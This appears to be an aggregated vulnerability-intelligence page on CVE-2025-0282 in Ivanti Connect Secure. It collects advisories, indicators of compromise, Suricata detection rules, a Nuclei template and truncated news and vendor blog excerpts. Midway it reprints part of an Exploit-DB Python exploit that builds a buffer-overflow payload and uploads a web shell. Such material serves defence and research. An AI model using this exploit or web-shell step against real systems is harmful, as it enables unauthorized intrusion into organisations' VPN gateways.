CVE-2025-0282
published 2025-01-08CVE-2025-0282: A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA…
PriorityP1100critical9CVSS 3.1
AVNACHPRNUINSCCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2025-01-15
Exploited in the wild
EPSS
99.97%
100.0th percentile
A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ivanti | connect_secure | — | — |
| ivanti | connect_secure | 22.7R2 – 22.7R2.4 | — |
| ivanti | neurons_for_zero-trust_access | — | — |
| ivanti | neurons_for_zta_gateways | 22.7R2 – 22.7R2.3 | — |
| ivanti | policy_secure | — | — |
| ivanti | policy_secure | 22.7R1 – 22.7R1.2 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
XOR key 0x27
- →Use the forged/fake Ivanti certificate sent unencrypted over the internet as a network signature to detect active RESURGE compromise. ↗
- →Check for the misspelled string 'DCOMLIENT' (missing 'C') in DLL binaries as an indicator of the malicious vixDiskLib.dll backdoor. ↗
- →Monitor for svchost.exe spawned in a suspended state followed by process hollowing, as used by the vixDiskLib.dll/deelevator64.dll backdoor to load decrypted payloads. ↗
- →Check for absence or deletion of /var/cores directory contents and deletion of /data/runtime/logs/log.events.vc0 and /data/var/dlogs/debuglog as anti-forensic indicators on Ivanti appliances. ↗
- →Detect attacker reconnaissance phase by monitoring for URL queries to ICS appliances designed to enumerate the appliance version, originating from VPS providers or Tor networks. ↗
- →Alert on SELinux being disabled or filesystem remounted on Ivanti Connect Secure appliances as a post-exploitation preparation step. ↗
- →Monitor for nmap and dig execution on compromised Ivanti appliances as indicators of internal network reconnaissance post-exploitation. ↗
- ·The fake Ivanti certificate used by RESURGE is only for authentication/verification and is not used to encrypt communication, but it does impersonate the legitimate server to evade detection. ↗
- ·Unit 42 tracks this activity as CL-UNK-0979 and notes overlaps with Mandiant's UNC5337, but has not confirmed they are the same threat actor group. ↗
CVSS provenance
nvdv3.19.0CRITICALCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck9.0CRITICAL
cisa9.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ivanti
Ivanti Connect Secure, Policy Secure, and ZTA Gateways Stack-Based Buffer Overflow Vulnerability
vendor_ivanti·2025-01-08·CVSS 9.0
CVE-2025-0282 [CRITICAL] Ivanti Connect Secure, Policy Secure, and ZTA Gateways Stack-Based Buffer Overflow Vulnerability
Ivanti Connect Secure, Policy Secure, and ZTA Gateways Stack-Based Buffer Overflow Vulnerability
Ivanti Connect Secure, Policy Secure, and ZTA Gateways contain a stack-based buffer overflow which can lead to unauthenticated remote code execution.
CVE IDs: CVE-2025-0282
This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog.
Required Action: Apply mitigations as set forth in the CISA instructions linked below to include conducting hunt activities, taking remediation actions if applicable, and applying updates prior to returning a device to service.
Remediation Due Date: 2025-01-15
Known to be used in ransomware campaigns.
CISA
Ivanti Connect Secure, Policy Secure, and ZTA Gateways Stack-Based Buffer Overflow Vulnerability
cisa·2025-01-08·CVSS 9.0
CVE-2025-0282 [CRITICAL] CWE-121 Ivanti Connect Secure, Policy Secure, and ZTA Gateways Stack-Based Buffer Overflow Vulnerability
Vulnerability: Ivanti Connect Secure, Policy Secure, and ZTA Gateways Stack-Based Buffer Overflow Vulnerability
Affected: Ivanti Connect Secure, Policy Secure, and ZTA Gateways
Ivanti Connect Secure, Policy Secure, and ZTA Gateways contain a stack-based buffer overflow which can lead to unauthenticated remote code execution.
Required Action: Apply mitigations as set forth in the CISA instructions linked below to include conducting hunt activities, taking remediation actions if applicable, and applying updates prior to returning a device to service.
Notes: CISA Mitigation Instructions: https://www.cisa.gov/cisa-mitigation-instructions-CVE-2025-0282 Additional References: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-0282-C
GHSA
GHSA-rf94-f4r9-6gxh: A stack-based buffer overflow in Ivanti Connect Secure before version 22
ghsa_unreviewed·2025-01-09
CVE-2025-0282 [CRITICAL] CWE-121 GHSA-rf94-f4r9-6gxh: A stack-based buffer overflow in Ivanti Connect Secure before version 22
A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.
VulnCheck
Ivanti Connect Secure, Policy Secure, and ZTA Gateways Stack-Based Buffer Overflow Vulnerability
vulncheck·2025·CVSS 9.0
CVE-2025-0282 [CRITICAL] CWE-121 Ivanti Connect Secure, Policy Secure, and ZTA Gateways Stack-Based Buffer Overflow Vulnerability
Ivanti Connect Secure, Policy Secure, and ZTA Gateways Stack-Based Buffer Overflow Vulnerability
Ivanti Connect Secure, Policy Secure, and ZTA Gateways contain a stack-based buffer overflow which can lead to unauthenticated remote code execution.
Affected: Ivanti Connect Secure, Policy Secure, and ZTA Gateways
Required Action: Apply mitigations as set forth in the CISA instructions linked below to include conducting hunt activities, taking remediation actions if applicable, and applying updates prior to returning a device to service.
Known Ransomware Campaign Use: Known
Exploitation References: https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day; https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gatewa
VulnCheck
Ivanti Connect Secure, Policy Secure, and Neurons stack-based buffer overflow
vulncheck·2025·CVSS 7.0
CVE-2025-0283 [HIGH] Ivanti Connect Secure, Policy Secure, and Neurons stack-based buffer overflow
Ivanti Connect Secure, Policy Secure, and Neurons stack-based buffer overflow
A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.
Affected: Ivanti Connect Secure, Policy Secure, and Neurons
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.ncsc.gov.uk/news/active-exploitation-ivanti-vulnerabilities; https://www.wiz.io/blog/cve-2025-0282-and-cve-2025-0283-critical-ivanti-0days-exploited-in-the-wild; http
Suricata
ET EXPLOIT Ivanti Connect Secure VPN IF-T/TLS clientCapabilities Remote Code Execution (CVE-2025-0282)
suricata·2025-01-13·CVSS 9.0
CVE-2025-0282 [CRITICAL] ET EXPLOIT Ivanti Connect Secure VPN IF-T/TLS clientCapabilities Remote Code Execution (CVE-2025-0282)
ET EXPLOIT Ivanti Connect Secure VPN IF-T/TLS clientCapabilities Remote Code Execution (CVE-2025-0282)
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Ivanti Connect Secure VPN IF-T/TLS clientCapabilities Remote Code Execution (CVE-2025-0282)"; flow:established,to_server; xbits:isset,ET.IFTTLS.HTTPRequest,track ip_pair; content:"|00 00|"; startswith; pcre:"/^(\x0a\x4c|\x05\x83)\x00\x00\x00\x88/R"; content:"clientCapabilities|3d|"; fast_pattern; pcre:"/^[^\x20\x0a]{257,}/R"; reference:url,labs.watchtowr.com/do-secure-by-design-pledges-come-with-stickers-ivanti-connect-secure-rce-cve-2025-0282/; reference:cve,2025-0282; classtype:attempted-admin; sid:2059171; rev:1; metadata:affected_product Ivanti, attack_target Networking_Equipment, tls_state TLSDecrypt, created_at 202
Suricata
ET WEB_SPECIFIC_APPS Ivanti Connect Secure Host Checker Recon (CVE-2025-0282)
suricata·2025-01-09·CVSS 9.0
CVE-2025-0282 [CRITICAL] ET WEB_SPECIFIC_APPS Ivanti Connect Secure Host Checker Recon (CVE-2025-0282)
ET WEB_SPECIFIC_APPS Ivanti Connect Secure Host Checker Recon (CVE-2025-0282)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Ivanti Connect Secure Host Checker Recon (CVE-2025-0282)"; flow:established,to_server; http.uri; content:"/dana-cached/hc/hc_launcher"; fast_pattern; pcre:"/^\x2e(?:\d+\x2e){4}jar/R"; reference:url,cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day; reference:cve,2025-0282; classtype:web-application-activity; sid:2059095; rev:1; metadata:affected_product Ivanti, attack_target Server, tls_state TLSDecrypt, created_at 2025_01_09, cve CVE_2025_0282, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence Low, signature_severity Major, tag CISA_KEV, updated_at 2025_01_09, mitre_tactic_
Exploit-DB
Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE)
exploitdb·2025-04-15·CVSS 9.0
CVE-2025-0282 [CRITICAL] Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE)
Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE)
---
# Exploit Title: Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE)
# Date: 2025-01-11
# Exploit Author: @absholi7ly
# CVE: CVE-2025-0282
import requests
import sys
import struct
import socket
import ssl
import urllib3
import time
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def create_exploit_payload(command, offset=500, system_address=0x0804a360, command_address=0x0804b008):
payload = b"A" * offset # Fill the buffer
payload += struct.pack(" /shell.php"
exploit_vulnerability(target_ip, command)
print("[+] Web shell uploaded successfully at /shell.php.")
verify_shell(target_ip)
except Exception as e:
print(f"[-] Error uploading web shell: {e}")
def verify_shell(t
Nuclei
Ivanti Connect Secure - Stack-based Buffer Overflow
nuclei·CVSS 9.0
CVE-2025-0282 [CRITICAL] Ivanti Connect Secure - Stack-based Buffer Overflow
Ivanti Connect Secure - Stack-based Buffer Overflow
Ivanti Connect Secure < 22.7R2.5, Ivanti Policy Secure < 22.7R1.2, and Ivanti Neurons for ZTA gateways < 22.7R2.3 contain a stack-based buffer overflow in the clientCapabilities parameter handling. This vulnerability allows remote unauthenticated attackers to execute arbitrary code through IF-T TLS requests.
Template:
id: CVE-2025-0282
info:
name: Ivanti Connect Secure - Stack-based Buffer Overflow
author: ritikchaddha
severity: critical
description: |
Ivanti Connect Secure < 22.7R2.5, Ivanti Policy Secure < 22.7R1.2, and Ivanti Neurons for ZTA gateways < 22.7R2.3 contain a stack-based buffer overflow in the clientCapabilities parameter handling. This vulnerability allows remote unauthenticated attackers to execute arbitrary code thro
Mandiant
Look What You Made Us Patch: 2025 Zero-Days in Review
blogs_mandiant·2026-03-05
Look What You Made Us Patch: 2025 Zero-Days in Review
Threat Intelligence
# Look What You Made Us Patch: 2025 Zero-Days in Review
March 5, 2026
##### Google Threat Intelligence Group
##### Google Threat Intelligence
Visibility and context on the threats that matter most.
Contact Us & Get a Demo
Written by: Casey Charrier, James Sadowski, Zander Work, Clement Lecigne, Benoît Sevens, Fred Plan
### Executive Summary
Google Threat Intelligence Group (GTIG) tracked 90 zero-day vulnerabilities exploited in-the-wild in 2025. Although that volume of zero-days is lower than the record high observed in 2023 (100), it is higher than 2024’s count (78) and remained within the 60–100 range established over the previous four years, indicating a trend toward stabilization at these levels.
In 2025, we continued to observe the structural shift, first
Mandiant
Look What You Made Us Patch: 2025 Zero-Days in Review
blogs_mandiant·2026-03-05
Look What You Made Us Patch: 2025 Zero-Days in Review
## Look What You Made Us Patch: 2025 Zero-Days in Review
## Google Threat Intelligence Group
## Google Threat Intelligence
Visibility and context on the threats that matter most.
Written by: Casey Charrier, James Sadowski, Zander Work, Clement Lecigne, Benoît Sevens, Fred Plan
## Executive Summary
Google Threat Intelligence Group (GTIG) tracked 90 zero-day vulnerabilities exploited in-the-wild in 2025. Although that volume of zero-days is lower than the record high observed in 2023 (100), it is higher than 2024’s count (78) and remained within the 60–100 range established over the previous four years, indicating a trend toward stabilization at these levels.
In 2025, we continued to observe the structural shift, first identified in 2024, toward increased enterprise exploitation. Both
Bleepingcomputer
CISA warns that RESURGE malware can be dormant on Ivanti devices
blogs_bleepingcomputer·2026-02-27·CVSS 9.0
CVE-2025-0282 [CRITICAL] CISA warns that RESURGE malware can be dormant on Ivanti devices
## CISA warns that RESURGE malware can be dormant on Ivanti devices
## Bill Toulas
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released new details about RESURGE, a malicious implant used in zero-day attacks exploiting CVE-2025-0282 to breach Ivanti Connect Secure devices.
The update focuses on the implant's undetected latency on the appliances and its "sophisticated network-level evasion and authentication techniques" that enable covert communication with the attacker.
CISA originally documented the malware on March 28 last year, saying that it can survive reboots, create webshells for stealing credentials, create accounts, reset passwords, and escalate privileges.
According to researchers at incident response company Mandiant, the critical CVE-2025-0282 vuln
Recorded Future
2025 Cloud Threat Hunting and Defense Landscape
blogs_recorded_future·2026-02-19
2025 Cloud Threat Hunting and Defense Landscape
## 2025 Cloud Threat Hunting and Defense Landscape
## Executive Summary
Insikt Group has observed continued trends of growth and increased activity of threat actors leveraging and exploiting cloud infrastructure to broaden the number of victims they target and infect. Recent reporting across the observed incidents shows that cloud-focused threats are converging on a few consistent patterns, which serve as the main sections of this report:
Exploitation and Misconfiguration
Cloud Abuse
Cloud Ransomware
Credential Abuse, Account Takeover, and Unauthorized Access
Third-Party Compromise
Across cases, initial access frequently comes from vulnerable or misconfigured services exposed to the internet — including application delivery controllers, monitoring dashboards, email security gateway
Greynoiseio
The Noise in the Silence: Unmasking CISA's Hidden KEV Ransomware Updates
blogs_greynoiseio·2026-02-02
The Noise in the Silence: Unmasking CISA's Hidden KEV Ransomware Updates
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Bleepingcomputer
Murky Panda hackers exploit cloud trust to hack downstream customers
blogs_bleepingcomputer·2025-08-22·CVSS 9.8
[CRITICAL] Murky Panda hackers exploit cloud trust to hack downstream customers
## Murky Panda hackers exploit cloud trust to hack downstream customers
## Lawrence Abrams
A Chinese state-sponsored hacking group known as Murky Panda (Silk Typhoon) exploits trusted relationships in cloud environments to gain initial access to the networks and data of downstream customers.
Murky Panda, also known as Silk Typhoon (Microsoft) and Hafnium, is known for targeting government, technology, academic, legal, and professional services organizations in North America.
The hacking group, under its numerous names, has been linked to numerous cyberespionage campaigns, including the wave of Microsoft Exchange breaches in 2021 that utilized the ProxyLogon vulnerability. More recent attacks, include those on the U.S. Treasury's Office of Foreign Assets Control (OFAC) and the Committee
Tenable
Cybersecurity Snapshot: U.K. NCSC’s Best Cyber Advice on AI Security, the Quantum Threat, API Risks, Mobile Malware and More
blogs_tenable·2025-05-09
Cybersecurity Snapshot: U.K. NCSC’s Best Cyber Advice on AI Security, the Quantum Threat, API Risks, Mobile Malware and More
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Bleepingcomputer
Ivanti patches Connect Secure zero-day exploited since mid-March
blogs_bleepingcomputer·2025-04-03·CVSS 9.0
CVE-2025-22457 [CRITICAL] Ivanti patches Connect Secure zero-day exploited since mid-March
## Ivanti patches Connect Secure zero-day exploited since mid-March
## Sergiu Gatlan
Ivanti has released security updates to patch a critical Connect Secure remote code execution vulnerability exploited by a China-linked espionage actor to deploy malware since at least mid-March 2025.
Tracked as CVE-2025-22457 , this critical security flaw is due to a stack-based buffer overflow weakness. It impacts Pulse Connect Secure 9.1x (which reached end-of-support in December), Ivanti Connect Secure 22.7R2.5 and earlier, Policy Secure, and Neurons for ZTA gateways.
According to Ivanti's advisory , remote threat actors can exploit it in high-complexity attacks that don't require authentication or user interaction. The company patched the vulnerability on February 11, 2025, with the release of Iva
Checkpoint
31st March – Threat Intelligence Report
blogs_checkpoint·2025-04-01
CVE-2025-2783 31st March – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 31st March – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 31st March, please download our Threat Intelligence Bulletin .
TOP ATTACKS AND BREACHES
New York University (NYU) suffered a cyber-attack which resulted in the exposure of over 3 million applicants’ data, including names, test scores, majors, and zip codes. The hacker redirected NYU’s website to display this information, alleging the university’s continued use of race-sensitive admissions policies despite the Su
Bleepingcomputer
Silk Typhoon hackers now target IT supply chains to breach networks
blogs_bleepingcomputer·2025-03-05
Silk Typhoon hackers now target IT supply chains to breach networks
## Silk Typhoon hackers now target IT supply chains to breach networks
## Bill Toulas
"After successfully compromising a victim, Silk Typhoon uses the stolen keys and credentials to infiltrate customer networks where they can then abuse a variety of deployed applications, including Microsoft services and others, to achieve their espionage objectives."
## Silk Typhoon storms IT supply chains
Silk Typhoon is a Chinese state-sponsored espionage group known for hacking the U.S. Office of Foreign Assets Control (OFAC) office in early December 2024 and stealing data from the Committee on Foreign Investment in the United States (CFIUS).
Microsoft reports that Silk Typhoon switched tactics around that period, abusing stolen API keys and compromised credentials for IT providers, identity manag
Tenable
Cybersecurity Snapshot: CISA Calls for Stamping Out Buffer Overflow Vulnerabilities, as Europol Tells Banks To Prep For Quantum Threat
blogs_tenable·2025-02-14
Cybersecurity Snapshot: CISA Calls for Stamping Out Buffer Overflow Vulnerabilities, as Europol Tells Banks To Prep For Quantum Threat
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Cybersecurity Snapshot: Cyber Agencies Offer Best Practices for Network Edge Security, While OWASP Ranks Top Risks of Non-Human Identities
blogs_tenable·2025-02-07
Cybersecurity Snapshot: Cyber Agencies Offer Best Practices for Network Edge Security, While OWASP Ranks Top Risks of Non-Human Identities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Wiz
Crying Out Cloud Newsletter - February 2025 | Wiz
blogs_wiz·2025-02-06
Crying Out Cloud Newsletter - February 2025 | Wiz
Welcome back! In this edition, we bring you the latest in cloud security – noteworthy incidents, exclusive data, and crucial vulnerabilities. Let's dive in.
Here are our top picks of cloud security highlights!
Hype or no hype – Codefinger Ransomware Campaign Targeting S3 Buckets
Codefinger is a ransomware campaign that exploits AWS Server-Side Encryption with Customer Provided Keys (SSE-C) to encrypt data in Amazon S3 buckets. While this campaign has sparked widespread concern, we argue that the panic is unwarranted. Many have focused on detecting unwanted SSE-C encryption as a mitigation strategy, but encryption is merely a tactic chosen by the attacker after gaining access—it is not the core issue. The real concern, which is neither new nor unique, is the use of compromised credential
Unit42
Threat Brief: CVE-2025-0282 and CVE-2025-0283 (Updated March 11)
blogs_unit42·2025-01-17·CVSS 9.0
CVE-2025-0282 [CRITICAL] Threat Brief: CVE-2025-0282 and CVE-2025-0283 (Updated March 11)
## Executive Summary
Unit 42 stopped monitoring this threat as well as updating this brief on March 11, 2025. Please refer to Ivanti's Security Advisory for the latest information.
On Jan. 8, 2025, Ivanti released a security advisory for two vulnerabilities (CVE-2025-0282 and CVE-2025-0283) in its Connect Secure, Policy Secure and ZTA gateway products. This threat brief provides attack details that we observed in a recent incident response engagement to provide actionable intelligence to the community. These details can be used to further detect current attacks noted in the wild using CVE-2025-0282.
These Ivanti products are all appliances that facilitate remote connections into a network. As such, they are outward-facing assets that attackers could target to infiltrate a network.
CVE-
Unit42
Threat Brief: CVE-2025-0282 and CVE-2025-0283 (Updated March 11)
blogs_unit42·2025-01-17·CVSS 9.0
CVE-2025-0282 [CRITICAL] Threat Brief: CVE-2025-0282 and CVE-2025-0283 (Updated March 11)
## Threat Brief: CVE-2025-0282 and CVE-2025-0283 (Updated March 11)
Unit 42
Published: January 16, 2025
High Profile Threats
Vulnerabilities
CL-UNK-0979
CVE-2025-0282
CVE-2025-0283
Ivanti
SPAWNMOLE
SPAWNSLOTH
SPAWNSNAIL
UNC5337
## Executive Summary
Unit 42 stopped monitoring this threat as well as updating this brief on March 11, 2025. Please refer to Ivanti's Security Advisory for the latest information.
On Jan. 8, 2025, Ivanti released a security advisory for two vulnerabilities ( CVE-2025-0282 and CVE-2025-0283 ) in its Connect Secure, Policy Secure and ZTA gateway products. This threat brief provides attack details that we observed in a recent incident response engagement to provide actionable intelligence to the community. These details can be used to further detect
Bleepingcomputer
UK domain registry Nominet confirms breach via Ivanti zero-day
blogs_bleepingcomputer·2025-01-13·CVSS 9.0
[CRITICAL] UK domain registry Nominet confirms breach via Ivanti zero-day
## UK domain registry Nominet confirms breach via Ivanti zero-day
## Sergiu Gatlan
Nominet, the official .UK domain registry and one of the largest country code registries, has confirmed that its network was breached two weeks ago using an Ivanti VPN zero-day vulnerability.
The company manages and operates over 11 million .uk, .co.uk, and .gov .uk domain names and other top-level domains, including .cymru and .wales.
It also ran the U.K.'s Protective Domain Name Service (PDNS) on behalf of the country's National Cyber Security Centre (NCSC) until September 2024 , protecting over 1,200 organizations and over 7 million end users.
Nominet is still investigating the incident but has not found evidence of any backdoors deployed on its systems, as first report by ISPreview .
Since it detec
Checkpoint
13th January – Threat Intelligence Report
blogs_checkpoint·2025-01-13
CVE-2025-0242 13th January – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 13th January – Threat Intelligence Report
The International Civil Aviation Organization (ICAO), that is part of the UN, confirmed a compromise of its recruitment database that exposed 42,000 recruitment applications. The data contains records from April 2016 to July 2024 and includes recruitment-related information, such as names, email addresses, dates of birth, and employment history.
Argentina’s airport security police (PSA) has been compromised with threat actors gaining access to its payroll systems. The at
Wiz
CVE-2025-0282 and CVE-2025-0283: Ivanti 0days in the Wild | Wiz Blog
blogs_wiz·2025-01-09·CVSS 9.0
CVE-2025-0282 [CRITICAL] CVE-2025-0282 and CVE-2025-0283: Ivanti 0days in the Wild | Wiz Blog
Ivanti has confirmed active exploitation of two vulnerabilities, CVE-2025-0282 and CVE-2025-0283, in Ivanti Connect Secure (ICS) VPN appliances. CVE-2025-0282, a zero-day vulnerability, has been exploited since December 2024, enabling unauthenticated remote code execution. According to Mandiant, the ongoing campaign involves multiple malware families and appears to include several threat actors, notably the China-nexus group UNC5337. Ivanti strongly recommends that customers upgrade their ICS appliances to the latest versions to mitigate these vulnerabilities.
# What are CVE-2025-0282 and CVE-2025-0283?
## CVE-2025-0282
CVE-2025-0282 is an unauthenticated stack-based buffer overflow vulnerability in Ivanti Connect Secure (ICS) VPN appliances, also affecting Policy Secure and Neurons for
Bleepingcomputer
Ivanti zero-day attacks infected devices with custom malware
blogs_bleepingcomputer·2025-01-09·CVSS 9.0
CVE-2025-0282 [CRITICAL] Ivanti zero-day attacks infected devices with custom malware
## Ivanti zero-day attacks infected devices with custom malware
## Bill Toulas
Hackers exploiting the critical Ivanti Connect Secure zero-day vulnerability disclosed yesterday installed on compromised VPN appliances new malware called ‘Dryhook’ and ‘Phasejam’ that is not currently associated with any threat group.
The security issue, now tracked as CVE-2025-0282 is a critical stack-based buffer overflow flaw that impacts Ivanti Connect Secure 22.7R2.5 and older, Ivanti Policy Secure 22.7R1.2 and older, and Ivanti Neurons for ZTA gateways 22.7R2.3 and older.
Although the flaw has a broad impact, the vendor specified that attacks were only observed against Connect Secure appliances while also noting that the number of affected customers is “limited.”
According to cybersecurity company M
Wiz
CVE-2025-0282 and CVE-2025-0283: Ivanti 0days in the Wild | Wiz Blog
blogs_wiz·2025-01-09·CVSS 9.0
CVE-2025-0282 [CRITICAL] CVE-2025-0282 and CVE-2025-0283: Ivanti 0days in the Wild | Wiz Blog
Ivanti has confirmed active exploitation of two vulnerabilities, CVE-2025-0282 and CVE-2025-0283, in Ivanti Connect Secure (ICS) VPN appliances. CVE-2025-0282, a zero-day vulnerability, has been exploited since December 2024, enabling unauthenticated remote code execution. According to Mandiant, the ongoing campaign involves multiple malware families and appears to include several threat actors, notably the China-nexus group UNC5337. Ivanti strongly recommends that customers upgrade their ICS appliances to the latest versions to mitigate these vulnerabilities.
## What are CVE-2025-0282 and CVE-2025-0283?
## CVE-2025-0282
CVE-2025-0282 is an unauthenticated stack-based buffer overflow vulnerability in Ivanti Connect Secure (ICS) VPN appliances, also affecting Policy Secure and Neurons fo
Bleepingcomputer
Ivanti warns of new Connect Secure flaw used in zero-day attacks
blogs_bleepingcomputer·2025-01-08·CVSS 9.0
CVE-2025-0282 [CRITICAL] Ivanti warns of new Connect Secure flaw used in zero-day attacks
## Ivanti warns of new Connect Secure flaw used in zero-day attacks
## Lawrence Abrams
Ivanti is warning that hackers exploited a Connect Secure remote code execution vulnerability tracked as CVE-2025-0282 in zero-day attacks to install malware on appliances.
The company says it became aware of the vulnerabilities after the Ivanti Integrity Checker Tool (ICT) detected malicious activity on customers' appliances. Ivanti launched an investigation and confirmed that threat actors were actively exploiting CVE-2025-0282 as a zero-day.
CVE-2025-0282 is a critical (9.0) stack-based buffer overflow bug in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 that allows a unauthenticated attacker
Tenable
CVE-2025-0282: Ivanti Connect Secure Zero-Day Vulnerability Exploited In The Wild
blogs_tenable·2025-01-08·CVSS 9.0
[CRITICAL] CVE-2025-0282: Ivanti Connect Secure Zero-Day Vulnerability Exploited In The Wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Greynoiseio
NoiseLetter March 2026
blogs_greynoiseio
NoiseLetter March 2026
Events, events… and yes, even more events. 🌍 GreyNoise has been on the move. March kept us busy with stops at eCrimes in London and SecIT in Hanover—but we’re just getting started. Over the next few months, we’ll be hitting the road for CrowdStrike CrowdTours across eight cities, heading to Glasgow to speak and sponsor CyberUK, and making our way to Tampa for H-ISAC. If you’ll be at any of these (or nearby), we’d love to connect.
And while we’ve been racking up miles, we haven’t slowed down on the research front. We’ve just released some exciting new findings—with even more coming in the next few weeks—so keep an eye out.
Thanks, as always, for being part of the GreyNoise community.
Featured
About this new report
Every enterprise firewall processes traffic from residential IP space. T
Recorded Future
H1 2025 Malware and Vulnerability Trends
blogs_recorded_future
H1 2025 Malware and Vulnerability Trends
## H1 2025 Malware and Vulnerability Trends
## Executive Summary
The first half of 2025 (H1 2025) reflected a rapidly evolving threat landscape defined by the convergence of persistent legacy threats and advanced new tactics.
